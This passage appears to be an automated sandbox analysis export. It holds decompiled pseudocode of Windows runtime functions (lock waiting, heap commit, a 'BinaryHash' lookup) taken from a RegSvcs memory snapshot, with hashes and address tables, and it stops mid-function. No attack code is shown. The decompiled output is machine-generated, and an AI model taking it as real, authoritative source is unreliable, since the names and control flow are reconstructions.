
Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 3c9c6c082a58895c2d0f1a777a792c5a82f29ca21bc8905d95a049a0d6db50aa
Instruction ID: 44c16673366b77db9143def97d8e7e25bb178d2e83ab518bfe2a585ae9a151a2
Opcode Fuzzy Hash: 3c9c6c082a58895c2d0f1a777a792c5a82f29ca21bc8905d95a049a0d6db50aa
Instruction Fuzzy Hash: 8AA13A71B006968BDB21DF6DC850BBAB7F4AF44720F24457DE946CB681EB34D905EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FB2D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00FB2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x10a5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x10a7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E00FF97C0();
				}
				if( *0x10a79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x10a79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E00FE1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E00FD7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0104FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E00FF9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E00FEE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E0100DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x10a6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x10a6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E00FF9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E00FF95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E00FD7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00FD7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01037016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0104FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x10a5350;
							if(_t109 != 0x10a5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0104FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01045720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x00fb2d8a
0x00fb2d8a
0x00fb2d92
0x00fb2d96
0x00fb2d9e
0x00fb2da0
0x00fb2da3
0x00fb2da5
0x00fb2da8
0x00fb2dab
0x00fb2db2
0x0100f9aa
0x0100f9ab
0x0100f9ae
0x0100f9ae
0x00fb2db8
0x00fb2dc2
0x0100f9b9
0x0100f9be
0x0100f9bf
0x0100f9bf
0x00fb2dcf
0x0100f9c9
0x00fb2dd5
0x00fb2dd5
0x00fb2dd5
0x00fb2dde
0x00fb2de1
0x00fb2e70
0x00fb2e72
0x00fb2e72
0x00fb2de7
0x00fb2deb
0x00fb2e7c
0x00fb2e83
0x00fb2e85
0x00fb2e8b
0x00fb2e8d
0x00fb2e92
0x00fb2e92
0x00fb2e85
0x00fb2df1
0x00fb2df7
0x00fb2df9
0x00fb2df9
0x00fb2dfc
0x00fb2dff
0x00fb2e02
0x00000000
0x00fb2e05
0x00fb2e0c
0x0100f9d9
0x00fb2e12
0x00fb2e12
0x00fb2e12
0x00fb2e1a
0x0100f9e3
0x0100f9e9
0x0100f9f0
0x0100f9f6
0x0100f9f8
0x0100f9f8
0x0100f9f0
0x00fb2e23
0x0100fa02
0x0100fa03
0x0100fa05
0x0100fa06
0x00000000
0x00fb2e29
0x00fb2e29
0x00fb2e2e
0x00fb2e34
0x00fb2e3e
0x00000000
0x00000000
0x00fb2e44
0x00fb2e47
0x00fb2e4d
0x00000000
0x00000000
0x00fb2e4f
0x00fb2e54
0x00000000
0x00000000
0x00fb2e5a
0x00fb2e5f
0x00fb2e9a
0x00fb2ea4
0x00fb2ea5
0x00fb2ea8
0x00fb2eaf
0x00fb2eb2
0x00fb2eb5
0x0100fae9
0x0100faeb
0x0100faed
0x0100faef
0x0100faf7
0x0100faf8
0x0100fafd
0x0100faff
0x0100fb04
0x0100fb04
0x0100faff
0x00fb2ec0
0x00fb2ec4
0x00fb2ec6
0x00fb2ec8
0x0100fb14
0x0100fb18
0x0100fb1e
0x0100fb21
0x0100fb21
0x00fb2ece
0x00fb2ece
0x00fb2ece
0x00fb2ed7
0x00fb2e61
0x00fb2e63
0x0100fa6b
0x0100fa71
0x0100fa76
0x0100fa78
0x0100fa8a
0x0100fa7a
0x0100fa83
0x0100fa83
0x0100fa8f
0x0100fa91
0x0100fa97
0x0100fa9d
0x0100faa4
0x0100faaa
0x0100faaf
0x0100fab1
0x0100fac3
0x0100fab3
0x0100fabc
0x0100fabc
0x0100fac8
0x0100facb
0x0100fadf
0x0100fadf
0x0100facb
0x0100faa4
0x0100fa91
0x00fb2e6f
0x00fb2e6f
0x00fb2e5f
0x0100fa13
0x0100fa15
0x0100fa17
0x0100fa1f
0x0100fa21
0x0100fa22
0x0100fa25
0x0100fa28
0x0100fa2f
0x0100fa2f
0x0100fa2a
0x0100fa2a
0x0100fa2a
0x0100fa31
0x0100fa34
0x0100fa36
0x0100fa3c
0x0100fa3e
0x0100fa41
0x0100fa43
0x0100fa45
0x0100fa45
0x0100fa41
0x0100fa3c
0x0100fa4a
0x0100fa4f
0x0100fa51
0x0100fa53
0x0100fa56
0x0100fa5b
0x0100fa5e
0x00000000
0x0100fa5e
0x00fb2e23

Strings

RTL: Re-Waiting, xrefs: 0100FA4A

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: a824e76297211305dcae2a82c68188c25637cb1f68d633ef44b36ff207b8d509
Instruction ID: f85f95499b3fa0807dc3537e3df7bccc3591081e13590c10ec9666f0030abf7c
Opcode Fuzzy Hash: a824e76297211305dcae2a82c68188c25637cb1f68d633ef44b36ff207b8d509
Instruction Fuzzy Hash: 49613771A006069FEB73DF6EC840BBE77E5EB45320F1442A5E591972C1C778DD41AB81

Uniqueness

Uniqueness Score: -1.00%

Function 01080EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01080EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0107FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01081074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00FF9730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0107A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0107A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x10a8b04 >> 0x14) + (_v44 -  *0x10a8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00FD7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0107138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00FD7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E0106FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x10a8724 & 0x00000008) != 0) {
						E010752F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E010815B5(0x10a8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x01080eb7
0x01080eb9
0x01080ec0
0x01080ec2
0x01080ecd
0x0108105b
0x0108105b
0x01081061
0x01081066
0x01081066
0x0108106b
0x01081073
0x01081073
0x01080ed3
0x01080ed6
0x01080edc
0x01080ee0
0x01080ee7
0x01080ef0
0x01080ef5
0x01080efa
0x01080efc
0x01080efd
0x01080f03
0x01080f04
0x01080f06
0x01080f07
0x01080f09
0x01080f0e
0x01080f14
0x01080f23
0x01080f2d
0x01080f34
0x01080f34
0x01080f14
0x01080f52
0x00000000
0x00000000
0x01080f58
0x01080f73
0x01080f74
0x01080f79
0x01080f7d
0x01080f80
0x01080f86
0x01080fab
0x01080fb5
0x01080fc6
0x01080fd1
0x01080fe3
0x01080fd3
0x01080fdc
0x01080fdc
0x01080feb
0x01081009
0x01081009
0x01081015
0x01081027
0x01081017
0x01081020
0x01081020
0x0108102f
0x0108103c
0x0108103c
0x01081048
0x01081050
0x01081050
0x01081055
0x00000000
0x01081055
0x01080f88
0x01080f9e
0x01080fa2
0x01080fa9
0x00000000
0x00000000
0x00000000
0x01080fa9
0x00000000

Strings

`, xrefs: 01080F16

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: b80947906fdf0c1a2b53f0b985dc72bc7ac7399e38fa5c2883e00df11d0edb7d
Instruction ID: ef01f9bdf3d0cc4c610e1d47df5017a54fc8e9f95807d7c4b19179ab5f3a19d4
Opcode Fuzzy Hash: b80947906fdf0c1a2b53f0b985dc72bc7ac7399e38fa5c2883e00df11d0edb7d
Instruction Fuzzy Hash: 3351AF703083429FD325EF18D880B5BBBE5EF84704F04496DFAD697691D671E80ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 00FEF0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00FEF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00FD4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00FF9830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00FF9990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00FF95D0();
							goto L11;
						} else {
							_t18 = _t82 + 0x18; // 0xb52c501a
							_t109 = L00FD4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								_t29 =  &(_t103[2]); // 0x2000b52c
								E00FFF3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t34 =  &(_t103[2]); // 0x2000b52c
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00FF95D0();
										L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x00fef0d3
0x00fef0d9
0x00fef0e0
0x00fef0e7
0x00fef0f2
0x00fef0f4
0x00fef0f8
0x00fef100
0x00fef108
0x00fef10d
0x00fef115
0x00fef116
0x00fef11f
0x00fef123
0x00fef124
0x00fef12c
0x00fef130
0x00fef134
0x00fef13d
0x00fef144
0x00fef14b
0x00fef152
0x0102bab0
0x0102bab0
0x00fef158
0x00fef158
0x00fef15a
0x00fef160
0x00fef165
0x00fef166
0x00fef16f
0x00fef173
0x0102baa7
0x0102baa7
0x0102baab
0x00000000
0x00fef179
0x00fef179
0x00fef18d
0x00fef191
0x0102baa2
0x00000000
0x00fef197
0x00fef19b
0x00fef1a2
0x00fef1a9
0x00fef1af
0x00fef1b2
0x00fef1b6
0x00fef1b9
0x00fef1c0
0x00fef1c4
0x00fef1d8
0x00fef1df
0x00fef1e3
0x00fef1e6
0x00fef1eb
0x00fef1ee
0x00fef1f4
0x00fef20f
0x0102bab7
0x0102babb
0x0102bacc
0x0102bad1
0x00fef215
0x00fef218
0x00fef226
0x00fef22b
0x00000000
0x00fef22b
0x00fef1f6
0x00fef1f6
0x00fef1f9
0x00fef1fb
0x00fef1fb
0x00fef1f4
0x00fef191
0x00fef173
0x00fef152
0x00fef203

Strings

@, xrefs: 00FEF124

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: b92172c674b89c45e5cbda55a1d030b3251d31a3c630799d24b41931cc7236b7
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 8F518B725047149FC321DF19C841A6BBBF9FF48710F10892EFA95876A0E7B8E904DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01033540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E01033540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x10ad360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00FF0BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01033706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00FFFA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E01033540;
						E00FFFA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0100DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E01040C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00FF97C0();
					}
					return E00FFB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E01033971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E01033884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00FFFA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00FF9650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E01033787(_a4,  &_v352, _t80);
						}
					}
					L00FD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00FF95D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x01033552
0x0103355a
0x0103355d
0x01033566
0x01033567
0x0103357e
0x0103358f
0x010335a1
0x010335a5
0x0103366b
0x0103366b
0x0103366d
0x01033672
0x01033679
0x01033685
0x0103368d
0x0103369d
0x010336a7
0x010336b8
0x010336c6
0x010336c7
0x010336dc
0x010336e1
0x010336e7
0x010336e9
0x010336e9
0x01033703
0x01033703
0x010335b5
0x010335c0
0x010335c4
0x00000000
0x00000000
0x010335ca
0x010335d7
0x010335e2
0x010335e6
0x010335e8
0x010335f5
0x010335fa
0x01033603
0x01033604
0x01033609
0x0103360a
0x01033612
0x01033613
0x0103361e
0x01033622
0x01033628
0x0103362f
0x0103362f
0x01033636
0x01033638
0x0103363b
0x01033642
0x01033642
0x01033636
0x01033657
0x01033657
0x0103365c
0x01033662
0x01033669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0103358F

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: a6e1d3023d75e21c9073df3c6ede559ed9be5f1391602904dd0afb4f3e4c0b7d
Instruction ID: 26075f7f3bebdf292c2662622e1f25a3a1e76d94f636a5b055f16eb8b23d2bbe
Opcode Fuzzy Hash: a6e1d3023d75e21c9073df3c6ede559ed9be5f1391602904dd0afb4f3e4c0b7d
Instruction Fuzzy Hash: 7E4163B290052D9FDB219B50CC81FEEB77CAF44714F0085A5EB48AB251DB359E889F94

Uniqueness

Uniqueness Score: -1.00%

Function 010805AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E010805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E010807DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00FF9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0107A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0107A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E01081293(_t79, _v40, E010807DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00FD7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0107138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x010805c5
0x010805ca
0x010805d3
0x010806db
0x010806db
0x010806dd
0x010806e3
0x010806e3
0x010805dd
0x010805e7
0x010805f6
0x01080600
0x01080607
0x01080610
0x01080615
0x0108061a
0x0108061c
0x0108061e
0x01080624
0x01080625
0x01080627
0x01080628
0x01080631
0x01080640
0x0108064d
0x01080654
0x01080654
0x01080631
0x0108066d
0x01080674
0x00000000
0x00000000
0x01080692
0x0108069e
0x010806b0
0x010806a0
0x010806a9
0x010806a9
0x010806b8
0x010806d6
0x010806d6
0x00000000

Strings

`, xrefs: 01080633

Memory Dump Source

Source File: 00000001.00000002.377160882.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000001.00000002.378745128.00000000010AB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.378771675.00000000010AF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_f90000_RegSvcs.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 28bfd4ab85f5ddab9992aa31d33337968de362e06650c1949e7938c01a199ac2
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: E831F5327083056BE720EE28CC45F9B7BD9BB88758F184129FAD4DB284D770E918C791

Uniqueness

Uniqueness Score: -1.00%

Function 01033884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E01033884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
